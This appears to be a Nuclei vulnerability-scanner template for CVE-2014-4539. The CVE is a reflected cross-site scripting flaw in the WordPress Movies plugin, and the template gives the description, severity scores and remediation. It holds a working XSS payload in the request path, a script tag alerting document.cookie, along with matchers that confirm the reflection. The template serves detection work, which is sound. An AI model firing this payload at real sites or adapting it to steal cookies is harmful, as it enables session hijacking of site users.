51 lines
2.0 KiB
YAML
51 lines
2.0 KiB
YAML
id: CVE-2014-4539
|
|
|
|
info:
|
|
name: Movies <= 0.6 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
|
|
- http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2014-4539
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00135
|
|
epss-percentile: 0.48439
|
|
cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: movies_project
|
|
product: movies
|
|
framework: wordpress
|
|
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth,movies_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'><script>alert(document.cookie)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210094c57de15f97fca4490843b947b7b690e1aa66fd6313ae1fc8efb8d3dda0e38102210099a8ad854656ce1b02f2890a1a3817915ef09aa5545cd42c952391d7304c75ef:922c64590222798bb761d5b6d8e72950 |